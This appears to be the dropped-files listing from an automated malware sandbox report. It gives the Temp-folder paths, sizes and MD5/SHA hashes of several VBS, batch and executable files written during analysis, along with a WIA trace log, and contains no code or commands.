SHA105b3c9cce2ded7e0cd02ba0c1b4dfd9ec6a09e1b
SHA256167d1c93bf7a0dd446b437e9035b28aff8edd9c5828b5cd1e28e88c507eb4d14
SHA512d3520a9185851155f6eb80b27241a24b992daaf726e494327fb6cc7ff48814d4fc6a02d31e7a91ea6eb57d221db58def902c3818b3f65e1baa4bbba1e56a9ef7
-
C:\Users\Admin\AppData\Local\Temp\BDF6.tmp\BDF7.tmp\BDF8.batFilesize
13KB
MD54da6ee3c7ebcf9ff3c27a0bfcc7e78aa
SHA105b3c9cce2ded7e0cd02ba0c1b4dfd9ec6a09e1b
SHA256167d1c93bf7a0dd446b437e9035b28aff8edd9c5828b5cd1e28e88c507eb4d14
SHA512d3520a9185851155f6eb80b27241a24b992daaf726e494327fb6cc7ff48814d4fc6a02d31e7a91ea6eb57d221db58def902c3818b3f65e1baa4bbba1e56a9ef7
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
54B
MD5888e64c554686bbbc0499057cce1af36
SHA15a7f51c66e3ae7dd0e0231c9817aee8c9fc54006
SHA256616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d
SHA5129882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
112B
MD542358fda8075b544bd30b846c6b0ffad
SHA1d1cec067376591089afdc39f4d2fdff60d68a8f1
SHA256efe04a8acb9cda8561d0076f51332784814b78cd4e52e6f6bdf3d7e3b2835405
SHA51278aab3fef009ccee6b7fa012aec650504961694aa692801f05b0058a8bc8ca308c2827b416086497fc3ceb94a56905ebfbe60def463f09b1ec699fff6d978bb5
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
162B
MD5d5980bf4b018e4c397df95afe8941c66
SHA1ce53c669a898d09479831bc59bc31a5fba2a6f2b
SHA2569afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a
SHA512c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
216B
MD57659392a12010d8c761cb9888f6fd5ac
SHA1b8829c26628740b77ab7405c231f420e860d8c1f
SHA25671bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431
SHA5125caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
270B
MD5adad2cd23a8880d4b3bdb1481c5b7998
SHA1823fc1acc3e7a3f0cffab5cb8fa453a8c0d1872c
SHA256838ba55eb15df2e0145178a20b4d01314d0fcde04ff871649012eaeba6bbfb69
SHA5128c600e32157daef85549d0a19a40f38e812e05cbf24e51453fa1ea94435e55fe4a705e77d42a4f63f3c565da98b4e69f1ed7bb6f3dbca65e80b17526954e60e4
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
318B
MD5ce1c128f0e16794ab3a171ad6c28b5bb
SHA15dbc3923a14e118c089b72a29b9c045092610a43
SHA256e7ee59348d83fbdf33f907c0cc5e3e417cb1ca4ae608541d08dd6d1c71cf222e
SHA512ddd22462cd5346f5ae30082cf2a1b8b220a7b6fd42ce691d760084ec9581f0912c72d075f6118d1198968ebfc80749085c820f22e88f1399b8b9e963b86865a4
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
318B
MD5ce1c128f0e16794ab3a171ad6c28b5bb
SHA15dbc3923a14e118c089b72a29b9c045092610a43
SHA256e7ee59348d83fbdf33f907c0cc5e3e417cb1ca4ae608541d08dd6d1c71cf222e
SHA512ddd22462cd5346f5ae30082cf2a1b8b220a7b6fd42ce691d760084ec9581f0912c72d075f6118d1198968ebfc80749085c820f22e88f1399b8b9e963b86865a4
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
324B
MD5b260589bc116e407e75412be10ce0c7c
SHA1b3498d228b26ad13ba76b27d624ef5eef940221c
SHA25661bf3a4e7eb43119fb6f69c2d63872f35b9b6d79fd5a846ad824951ccea9898f
SHA512007b78a36ea10d91360610ceec313bfa51c663c719859edf95dae0cdb75bdbbe6908bf0cb4c3f2e237539e0e20dc64266328e8a82ad5a7c90b59b6f56f683c4f
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
328B
MD5b293c638fb6956e5db1746725a79d8e3
SHA1a459cc36557de50b755d1b23019f5277501269cf
SHA25608b0083253679dc3b6f7d1099e079e8e277f80a847df9e4663dcb0052146f218
SHA512340ba163a9e2bb4f3e0c2dd15354d5d9ad002753a3ba56407688c224fa3d854e5f6ac30c34835eca424fb7005feb7dd8a3965b96d9ed4c8d3cef79a26c51bf0e
-
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbsFilesize
378B
MD5598e89776a2342ea6d8b4035643da929
SHA1714cac1cbe4ba77bbd270faeffa3ea3c9bab61ba
SHA25653547edb5bd2cda23359fbb7c577e0bda6d5a8e984b5f2a228ee9c60feaed3a4
SHA5126ff3eac0032560c6e7f2a9518511cdf6a62d3dc6e2792df10fac0b4d9bbb598822eb168e4c921230f5f90905c3e7074eec70f40805518041394e8a0e838d68c8
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
2KB
MD5d4fa5ff797aa3366c59deefb1da2aa70
SHA19d29534ef8e7ccc3dcaf0c03f3792d36a0dc4538
SHA256dc0ba522f8e324d5f72c82582df78fdf3d474d866009ce361d6c190ecf360197
SHA512f8fc13e5dc12736da12187a9b7609e859856a0bc91fd811a597b1535bd2a2e6c5a61c35e99f9c3492938b717c620a4ce94bb9f59eda401fee31cfcc5a5d302d7
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
69B
MD572946942abf5cf295f726b816c531ebf
SHA18ac5ccae8003c3776c2e0ee0959a76c8bc913495
SHA256d9fc0446467e00e640f0dd0bf36882943a6993dcc1038ba8f73239152896eb25
SHA5122f42b10e2c1359a690e1a69e307008e3beb4712e4c071d916fb1380c61cb2ed3ae48c86af44c6f1c9d613e85dd75d8cfd66fd01de0649444ee6d5193d9789d23
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
138B
MD5fdac6c0d6442c0cfe7c0b69e80227f0a
SHA1d0d9aea2bf7a4bf1b45237e2207d37830a578d8c
SHA256b759fa635b2bbce2570feea401c7d2a9735844d204f5bcdbc88f3a3a761f3959
SHA5127e5dc4b0876173f05f69f523d50ad573f5dfced10a771d1b28315c2a068b6f6c39ae5edd2433223f79e7d32b9180801746c9621de02cba026f93412b83339da4
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
207B
MD5d3715d7f77349116a701484780269375
SHA1589c48410637ac33431569b867070a51c4de5b1c
SHA256ea0bdd86d283aba33d619aeecb5087ad9132b58e8ae7121e3c3774504abb976a
SHA5129526a79ac4f9a18104f8e84d684136eef9b6bbccfe772d1d1030d9be02de2f7221cdee248ec748971551a42ed1d8fb1c8a9d820b837164f68376cdee1dc8ff3a
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
276B
MD5089381a847f01ba0962ae00f0d92d5e8
SHA19f3240f89871639778a318e0cadccafcf9d7c55e
SHA2562cda289b5067c9daf8b4dffdf323b2fe9d0a47bfdbb91b4a017029bc74729c05
SHA51289fbf1b423f17101970290b070d740b8d58beecc6723e64edb7ae23b9285afe3a612b8e8f5ec202d60aca3875a28dbc556a43af9fe4113ac0bdba1fa83c5213a
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
345B
MD5baa511e0932e6c0781dd1488615d17a6
SHA1e3218aefe8c272ade02eb6cc5188df6d50b04de0
SHA25620fa853d5be5b8f30eeb6ae3e24558a2091d80102944ab26b9861df5cea6c6fa
SHA51224be7fabda63dd82dfb5307e2ae0dc7176bf59c0918f1316bddb7515e0695b10cd6e24420af4afcda3d5f1b01e3d540a2d75a629f40c381da05eb3c28ff4697e
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
414B
MD5873781e160d6c7a2c7100536f95e373a
SHA1439389553b0f4b61327c0160a92e4c8ddca8f84d
SHA256e244905c9acc529b7d7dbd58453f44dbd3f3d627bba23adcf375afde9b6b2a35
SHA5121116b365d1e44dbad9fcdf462bb3467dbe3ab8b40a01c7dc6d516b24d2b1260c405cbda80f7a1177f89412a2db726a68e6ae2ceee839c117061ecbb75a06a4aa
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
477B
MD50e32716d5981f8027511862bd47ed483
SHA1c1ccc3e32a32c8d81bf6cd84ebd633ccc16655da
SHA2564628641b8b8230d90f250dd11692899970bde93ec36f5f0fdb4689eb40e560f2
SHA512ea33e5f71040e2fc4a78f5294084b3de8e873adf8c6107ee8a859cb536ac75569b14b3555e44fcfc15db7f923e92f95d43640032ee85d6dda7aaa7a7562a96c7
-
C:\Users\Admin\AppData\Local\Temp\Informacion.vbsFilesize
483B
MD521321634b2c2bf8223d389be19d13d4e
SHA1116c0af8712cc2120fbb6c4893f9a99a77242960
SHA256fa1ddb950fadc33035dc70e015155e7db6fefaddc05d83cc1fab233e3c416f60
SHA512feea91421292af2cb0348c6c09b2bbe810f3a3385c5b5ddbb7e6312aa7f97f48eebf10d6f9966b2fee8f4e843e87ceabf78318c9ac9b070478f0372471acce20
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
4KB
MD56b235b86d1abd68e56dfc52018562fed
SHA1a84ec292781fb7b2d1bf6d6c906b38563f10027e
SHA2562cce0f690c09625519edff5a88456252888ddda9057af76542c36215a7240715
SHA512c0eabcf5fb8273625e6a8568e3d710be726c363b3518497ecff840efaea7b182a62d7f07ec3c4a0aacb29ec2e0f324b78d5c3d4621693b914f704ab626a41fc0
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
206B
MD5b8745a8fdae2b060fbdba1582893e071
SHA14631a5ae272dfde8921c33ae701bd7d4f055a637
SHA256a67bec1e701ea02a6ad53b706d8c7dcfba577f62db1d91a0decd75abc2657ed5
SHA51237dddb78f0ce713274725b24497ee3203f66d5c21a7b150037b946c44555dd7650f2e81b168a500aebf73b5c92e3a694d2a886538a3e1af3c8abe775b14ee1ab
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
412B
MD564c1a9b6bb30775cd6ebca0cb8cdedcb
SHA1a66b216f47aeca1cc964fee8400fa2c272408eeb
SHA256b4202bbbd268e1fd6391a7c1899d7c34ffe5f62d7468cb186975be60c86dc59c
SHA5122f4037179d778d22a8e407e0b677920307d1c9513a8211919226a9522d63ef63f9af3e4732937dc04bfeb75686731890b56fa38bb9bcf6d2109437c9d8633681
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
618B
MD5a74feb473b2a1c416fce81edb6859ddd
SHA12ae1f661587cc891c3170c6c5d237dd9ba7ef411
SHA25610ba4e27b1332f6dab91378f9a911878be41a4d587dc04618838eb7249fd99fe
SHA51245de02ae0d80d62c5e3df19e03f8f27228b0f2eb26c8c847326a37c75650f44263e707c5af8576fa32e4e662dba220813a6c599bbd6ead3d55e3df66f0cb48f6
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
824B
MD57557eef659e8d22cb74dee793f0fac3c
SHA1f467c5454bc5f1bfb653f054edee9fa088a5bcbe
SHA2563d7b96722887ea0a88f013b756e6f0975f2c856497967abeee6aa8c43101d5bb
SHA51254070304b9fa25cd92eeee2a097ccc106c39883ef174e661c8b319c224f1b4d04dc45e508215a9888ca0198644762f3884707e4b1505d696eff4fa8fb3a84b29
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
1KB
MD5a1e395827406a41fb3ee6ad163dcd3f1
SHA119d54e59221c9c0c70a8d1dd89ed3dd366e50f82
SHA2564b62e603320ac2095fea42ce89e24be3671f59ba35be3fe5ddcf2c9a878802fb
SHA512e1f9b84dbec954ce3f446cb34ee1a6a1614ba3c95ec8fe6b5ecee976933dd5ddec353b482cd9b3a22c8c8d02e219933150a9592d51923bf3bf519738167997c6
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
1KB
MD5a4bec65459d41f9cd6e04e946839d919
SHA18b02a52d623ee606a357fcbc0595ac7328606f4b
SHA2567fcdeaf591562b2b559fc61f0894c1869f8826ad1733e8bfd99828ecdbe91423
SHA51258f9ebc1c0564f319fbb833cdafed7f7ef6d581a2652d60e36f693c8da73e9e2217eba941fea59849e89211f91d888d329730d7299e06b0379ab02f6ea8d7a10
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
1KB
MD563691ef46dcf95f55e16855ca489b4e4
SHA19bff1a6e597ac7efbc698530f957c5da3f80b3e8
SHA256ff51c2f7f16d46a6e4c58da55dd413fc55c713fc5d031d22b5b377b04d5fbab6
SHA51224cf11595de33805f36a04ca292195b4319c560a64747abe1cc8c3479fe3ed04c42684210a577659b34e226c3af16ed66212ff62e703dd1fc10b2a240025c2c9
-
C:\Users\Admin\AppData\Local\Temp\Taskdl.batFilesize
1KB
MD50eda86217329d903179de52d9e39c5ad
SHA1d0eb25b38e81371b0270c8cd2b2719407009d55d
SHA2567af543fd037949262dbb9122eea9b4e5442c9d6559d45e7cfe57142f733c13a6
SHA512ac4967d543a31bc757e9c0a544b180fd739af8728cd4ce25c263166ff3142a83e77c00f6986c8c3c1a018e4b3bafccaf20ff312a15595a10917c1c15a5d69956
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exeFilesize
5KB
MD50b93e0b54355d3fec1ca8a9fa34a0354
SHA1ce578cf63e26a3676eac57d53eb24a6d2d205118
SHA256a01428209bc3e038d9c5ef9c3904f30628067b000295d7478aefa69fae3c0375
SHA5125ca21db00016b9d2bc9ac6fac1b2311a62bf5d377837fdb4ec272c2c0ff2090c2524cbeb9ba8fd4d968c873fa2c4ecfd68b35ac85b890b567f81273fa28b1b0c
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exeFilesize
5KB
MD50b93e0b54355d3fec1ca8a9fa34a0354
SHA1ce578cf63e26a3676eac57d53eb24a6d2d205118
SHA256a01428209bc3e038d9c5ef9c3904f30628067b000295d7478aefa69fae3c0375
SHA5125ca21db00016b9d2bc9ac6fac1b2311a62bf5d377837fdb4ec272c2c0ff2090c2524cbeb9ba8fd4d968c873fa2c4ecfd68b35ac85b890b567f81273fa28b1b0c
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exeFilesize
6KB
MD57a272d98ee71b94c40ea2c293a9c1e4c
SHA1475fc39dfb91040bc3745503c9919df27d57a6e3
SHA25623e20b75619f7d5ca1aeb72d74ee5e54ca8db9f26574a9cb78d066da94693e5e
SHA51239dcd56cbd0174a92a20c63170ba5723b170bde8f298821494cc905b87c3f388ab5340c8ba0b572d3fe0457f2e900e3d6a371672a26bd92b035facbfa7e1c87a
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exeFilesize
10KB
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
13KB
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
17KB
-
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
20KB
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
11B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
22B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
44B
-
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
49B
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize
3KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize
4KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize
6KB
-
C:\Windows\Debug\WIA\wiatrace.log
Filesize
7KB